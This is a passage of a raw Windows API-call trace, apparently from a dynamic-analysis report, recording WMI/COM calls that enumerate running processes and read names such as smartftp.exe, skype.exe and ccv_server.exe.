[3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43e5f8 | out: ppvObject=0x43e5f8*=0x0) returned 0x80004002 [0279.690] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5716230, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e604 | out: ppvObject=0x43e604*=0x570ea88) returned 0x0 [0279.690] WbemDefPath:IUnknown:Release (This=0x5716230) returned 0x0 [0279.690] WbemDefPath:IUnknown:QueryInterface (in: This=0x570ea88, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e224 | out: ppvObject=0x43e224*=0x570ea88) returned 0x0 [0279.690] WbemDefPath:IUnknown:QueryInterface (in: This=0x570ea88, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e1d8 | out: ppvObject=0x43e1d8*=0x0) returned 0x80004002 [0279.690] WbemDefPath:IUnknown:AddRef (This=0x570ea88) returned 0x3 [0279.690] WbemDefPath:IUnknown:QueryInterface (in: This=0x570ea88, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43db34 | out: ppvObject=0x43db34*=0x0) returned 0x80004002 [0279.690] WbemDefPath:IUnknown:QueryInterface (in: This=0x570ea88, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43dae4 | out: ppvObject=0x43dae4*=0x0) returned 0x80004002 [0279.690] WbemDefPath:IUnknown:QueryInterface (in: This=0x570ea88, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43daf0 | out: ppvObject=0x43daf0*=0x5716240) returned 0x0 [0279.690] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5716240, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43daf8 | out: pCid=0x43daf8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0279.690] WbemDefPath:IUnknown:Release (This=0x5716240) returned 0x3 [0279.691] WbemDefPath:IUnknown:QueryInterface (in: This=0x570ea88, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43dfe4 | out: ppvObject=0x43dfe4*=0x0) returned 0x80004002 [0279.691] WbemDefPath:IUnknown:Release (This=0x570ea88) returned 0x2 [0279.691] WbemDefPath:IUnknown:Release (This=0x570ea88) returned 0x1 [0279.691] WbemDefPath:IUnknown:QueryInterface (in: This=0x570ea88, riid=0x43e924*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x43e920 | out: ppvObject=0x43e920*=0x570ea88) returned 0x0 [0279.691] WbemDefPath:IUnknown:AddRef (This=0x570ea88) returned 0x3 [0279.691] WbemDefPath:IUnknown:Release (This=0x570ea88) returned 0x2 [0279.691] WbemDefPath:IWbemPath:SetText (This=0x570ea88, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2076\"") returned 0x0 [0279.691] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43eaa0 | out: puCount=0x43eaa0*=0x2) returned 0x0 [0279.692] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0x0, pszText=0x0 | out: puBuffLength=0x43ea9c*=0xf, pszText=0x0) returned 0x0 [0279.692] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea9c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.692] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43ea6c | out: puCount=0x43ea6c*=0x2) returned 0x0 [0279.692] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0x0, pszText=0x0 | out: puBuffLength=0x43ea68*=0xf, pszText=0x0) returned 0x0 [0279.692] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea68*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.692] IWbemClassObject:Get (in: This=0x5713580, wszName="Name", lFlags=0, pVal=0x43ea68*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27d5aac*=0, plFlavor=0x27d5ab0*=0 | out: pVal=0x43ea68*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="smartftp.exe", varVal2=0x0), pType=0x27d5aac*=8, plFlavor=0x27d5ab0*=0) returned 0x0 [0279.692] IWbemClassObject:Get (in: This=0x5713580, wszName="Name", lFlags=0, pVal=0x43ea70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27d5aac*=8, plFlavor=0x27d5ab0*=0 | out: pVal=0x43ea70*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="smartftp.exe", varVal2=0x0), pType=0x27d5aac*=8, plFlavor=0x27d5ab0*=0) returned 0x0 [0279.692] IEnumWbemClassObject:Next (in: This=0x5115f8, lTimeout=-1, uCount=0x1, apObjects=0x5716270, puReturned=0x27bb39c | out: apObjects=0x5716270*=0x5713718, puReturned=0x27bb39c*=0x1) returned 0x0 [0279.694] IMarshal:GetUnmarshalClass (in: This=0x571371c, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43d9a0 | out: pCid=0x43d9a0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0279.694] IUnknown:Release (This=0x571371c) returned 0x3 [0279.694] IWbemClassObject:Get (in: This=0x5713718, wszName="__GENUS", lFlags=0, pVal=0x43ea64*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eae4*=0, plFlavor=0x43eae0*=0 | out: pVal=0x43ea64*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x43eae4*=3, plFlavor=0x43eae0*=64) returned 0x0 [0279.694] IWbemClassObject:Get (in: This=0x5713718, wszName="__PATH", lFlags=0, pVal=0x43ea48*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eacc*=0, plFlavor=0x43eac8*=0 | out: pVal=0x43ea48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2296\"", varVal2=0x0), pType=0x43eacc*=8, plFlavor=0x43eac8*=64) returned 0x0 [0279.694] IComThreadingInfo:GetCurrentApartmentType (in: This=0x500344, pAptType=0x43ea6c | out: pAptType=0x43ea6c*=1) returned 0x0 [0279.695] IUnknown:QueryInterface (in: This=0x500344, riid=0x277dfcc*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x43ea70 | out: ppvObject=0x43ea70*=0x0) returned 0x80004002 [0279.695] IUnknown:Release (This=0x500344) returned 0x1 [0279.695] CoGetClassObject (in: rclsid=0x5aa304*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43e3e0 | out: ppv=0x43e3e0*=0x5716270) returned 0x0 [0279.696] WbemDefPath:IUnknown:QueryInterface (in: This=0x5716270, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43e5f8 | out: ppvObject=0x43e5f8*=0x0) returned 0x80004002 [0279.696] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5716270, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e604 | out: ppvObject=0x43e604*=0x570eb68) returned 0x0 [0279.696] WbemDefPath:IUnknown:Release (This=0x5716270) returned 0x0 [0279.696] WbemDefPath:IUnknown:QueryInterface (in: This=0x570eb68, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e224 | out: ppvObject=0x43e224*=0x570eb68) returned 0x0 [0279.696] WbemDefPath:IUnknown:QueryInterface (in: This=0x570eb68, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e1d8 | out: ppvObject=0x43e1d8*=0x0) returned 0x80004002 [0279.696] WbemDefPath:IUnknown:AddRef (This=0x570eb68) returned 0x3 [0279.696] WbemDefPath:IUnknown:QueryInterface (in: This=0x570eb68, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43db34 | out: ppvObject=0x43db34*=0x0) returned 0x80004002 [0279.697] WbemDefPath:IUnknown:QueryInterface (in: This=0x570eb68, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43dae4 | out: ppvObject=0x43dae4*=0x0) returned 0x80004002 [0279.697] WbemDefPath:IUnknown:QueryInterface (in: This=0x570eb68, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43daf0 | out: ppvObject=0x43daf0*=0x5716280) returned 0x0 [0279.697] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5716280, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43daf8 | out: pCid=0x43daf8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0279.697] WbemDefPath:IUnknown:Release (This=0x5716280) returned 0x3 [0279.697] WbemDefPath:IUnknown:QueryInterface (in: This=0x570eb68, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43dfe4 | out: ppvObject=0x43dfe4*=0x0) returned 0x80004002 [0279.697] WbemDefPath:IUnknown:Release (This=0x570eb68) returned 0x2 [0279.697] WbemDefPath:IUnknown:Release (This=0x570eb68) returned 0x1 [0279.697] WbemDefPath:IUnknown:QueryInterface (in: This=0x570eb68, riid=0x43e924*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x43e920 | out: ppvObject=0x43e920*=0x570eb68) returned 0x0 [0279.698] WbemDefPath:IUnknown:AddRef (This=0x570eb68) returned 0x3 [0279.698] WbemDefPath:IUnknown:Release (This=0x570eb68) returned 0x2 [0279.698] WbemDefPath:IWbemPath:SetText (This=0x570eb68, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2296\"") returned 0x0 [0279.698] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43eaa0 | out: puCount=0x43eaa0*=0x2) returned 0x0 [0279.698] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0x0, pszText=0x0 | out: puBuffLength=0x43ea9c*=0xf, pszText=0x0) returned 0x0 [0279.698] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea9c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.698] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43ea6c | out: puCount=0x43ea6c*=0x2) returned 0x0 [0279.698] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0x0, pszText=0x0 | out: puBuffLength=0x43ea68*=0xf, pszText=0x0) returned 0x0 [0279.698] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea68*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.699] IWbemClassObject:Get (in: This=0x5713718, wszName="Name", lFlags=0, pVal=0x43ea68*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27d632c*=0, plFlavor=0x27d6330*=0 | out: pVal=0x43ea68*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="skype.exe", varVal2=0x0), pType=0x27d632c*=8, plFlavor=0x27d6330*=0) returned 0x0 [0279.699] IWbemClassObject:Get (in: This=0x5713718, wszName="Name", lFlags=0, pVal=0x43ea70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27d632c*=8, plFlavor=0x27d6330*=0 | out: pVal=0x43ea70*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="skype.exe", varVal2=0x0), pType=0x27d632c*=8, plFlavor=0x27d6330*=0) returned 0x0 [0279.699] IEnumWbemClassObject:Next (in: This=0x5115f8, lTimeout=-1, uCount=0x1, apObjects=0x57162b0, puReturned=0x27bb39c | out: apObjects=0x57162b0*=0x57138b0, puReturned=0x27bb39c*=0x1) returned 0x0 [0279.700] IMarshal:GetUnmarshalClass (in: This=0x57138b4, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43d9a0 | out: pCid=0x43d9a0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0279.700] IUnknown:Release (This=0x57138b4) returned 0x3 [0279.701] IWbemClassObject:Get (in: This=0x57138b0, wszName="__GENUS", lFlags=0, pVal=0x43ea64*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eae4*=0, plFlavor=0x43eae0*=0 | out: pVal=0x43ea64*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x43eae4*=3, plFlavor=0x43eae0*=64) returned 0x0 [0279.701] IWbemClassObject:Get (in: This=0x57138b0, wszName="__PATH", lFlags=0, pVal=0x43ea48*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eacc*=0, plFlavor=0x43eac8*=0 | out: pVal=0x43ea48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2244\"", varVal2=0x0), pType=0x43eacc*=8, plFlavor=0x43eac8*=64) returned 0x0 [0279.701] IComThreadingInfo:GetCurrentApartmentType (in: This=0x500344, pAptType=0x43ea6c | out: pAptType=0x43ea6c*=1) returned 0x0 [0279.701] IUnknown:QueryInterface (in: This=0x500344, riid=0x277dfcc*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x43ea70 | out: ppvObject=0x43ea70*=0x0) returned 0x80004002 [0279.701] IUnknown:Release (This=0x500344) returned 0x1 [0279.702] CoGetClassObject (in: rclsid=0x5aa304*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43e3e0 | out: ppv=0x43e3e0*=0x57162b0) returned 0x0 [0279.702] WbemDefPath:IUnknown:QueryInterface (in: This=0x57162b0, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43e5f8 | out: ppvObject=0x43e5f8*=0x0) returned 0x80004002 [0279.702] WbemDefPath:IClassFactory:CreateInstance (in: This=0x57162b0, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e604 | out: ppvObject=0x43e604*=0x5718f38) returned 0x0 [0279.702] WbemDefPath:IUnknown:Release (This=0x57162b0) returned 0x0 [0279.702] WbemDefPath:IUnknown:QueryInterface (in: This=0x5718f38, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e224 | out: ppvObject=0x43e224*=0x5718f38) returned 0x0 [0279.703] WbemDefPath:IUnknown:QueryInterface (in: This=0x5718f38, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e1d8 | out: ppvObject=0x43e1d8*=0x0) returned 0x80004002 [0279.703] WbemDefPath:IUnknown:AddRef (This=0x5718f38) returned 0x3 [0279.703] WbemDefPath:IUnknown:QueryInterface (in: This=0x5718f38, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43db34 | out: ppvObject=0x43db34*=0x0) returned 0x80004002 [0279.703] WbemDefPath:IUnknown:QueryInterface (in: This=0x5718f38, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43dae4 | out: ppvObject=0x43dae4*=0x0) returned 0x80004002 [0279.703] WbemDefPath:IUnknown:QueryInterface (in: This=0x5718f38, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43daf0 | out: ppvObject=0x43daf0*=0x57162c0) returned 0x0 [0279.703] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x57162c0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43daf8 | out: pCid=0x43daf8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0279.703] WbemDefPath:IUnknown:Release (This=0x57162c0) returned 0x3 [0279.704] WbemDefPath:IUnknown:QueryInterface (in: This=0x5718f38, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43dfe4 | out: ppvObject=0x43dfe4*=0x0) returned 0x80004002 [0279.718] WbemDefPath:IUnknown:Release (This=0x5718f38) returned 0x2 [0279.718] WbemDefPath:IUnknown:Release (This=0x5718f38) returned 0x1 [0279.718] WbemDefPath:IUnknown:QueryInterface (in: This=0x5718f38, riid=0x43e924*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x43e920 | out: ppvObject=0x43e920*=0x5718f38) returned 0x0 [0279.718] WbemDefPath:IUnknown:AddRef (This=0x5718f38) returned 0x3 [0279.718] WbemDefPath:IUnknown:Release (This=0x5718f38) returned 0x2 [0279.718] WbemDefPath:IWbemPath:SetText (This=0x5718f38, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2244\"") returned 0x0 [0279.719] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43eaa0 | out: puCount=0x43eaa0*=0x2) returned 0x0 [0279.719] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0x0, pszText=0x0 | out: puBuffLength=0x43ea9c*=0xf, pszText=0x0) returned 0x0 [0279.719] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea9c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.719] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43ea6c | out: puCount=0x43ea6c*=0x2) returned 0x0 [0279.719] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0x0, pszText=0x0 | out: puBuffLength=0x43ea68*=0xf, pszText=0x0) returned 0x0 [0279.719] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea68*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.719] IWbemClassObject:Get (in: This=0x57138b0, wszName="Name", lFlags=0, pVal=0x43ea68*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27d6b90*=0, plFlavor=0x27d6b94*=0 | out: pVal=0x43ea68*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ccv_server.exe", varVal2=0x0), pType=0x27d6b90*=8, plFlavor=0x27d6b94*=0) returned 0x0 [0279.719] IWbemClassObject:Get (in: This=0x57138b0, wszName="Name", lFlags=0, pVal=0x43ea70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27d6b90*=8, plFlavor=0x27d6b94*=0 | out: pVal=0x43ea70*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ccv_server.exe", varVal2=0x0), pType=0x27d6b90*=8, plFlavor=0x27d6b94*=0) returned 0x0 [0279.720] IEnumWbemClassObject:Next (in: This=0x5115f8, lTimeout=-1, uCount=0x1, apObjects=0x57162f0, puReturned=0x27bb39c | out: apObjects=0x57162f0*=0x5713a48, puReturned=0x27bb39c*=0x1) returned 0x0 [0279.721] IMarshal:GetUnmarshalClass (in: This=0x5713a4c, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43d9a0 | out: pCid=0x43d9a0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0279.721] IUnknown:Release (This=0x5713a4c) returned 0x3 [0279.721] IWbemClassObject:Get (in: This=0x5713a48, wszName="__GENUS", lFlags=0, pVal=0x43ea64*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eae4*=0, plFlavor=0x43eae0*=0 | out: pVal=0x43ea64*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x43eae4*=3, plFlavor=0x43eae0*=64) returned 0x0 [0279.722] IWbemClassObject:Get (in: This=0x5713a48, wszName="__PATH", lFlags=0, pVal=0x43ea48*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eacc*=0, plFlavor=0x43eac8*=0 | out: pVal=0x43ea48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2288\"", varVal2=0x0), pType=0x43eacc*=8, plFlavor=0x43eac8*=64) returned 0x0 [0279.722] IComThreadingInfo:GetCurrentApartmentType (in: This=0x500344, pAptType=0x43ea6c | out: pAptType=0x43ea6c*=1) returned 0x0 [0279.722] IUnknown:QueryInterface (in: This=0x500344, riid=0x277dfcc*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, 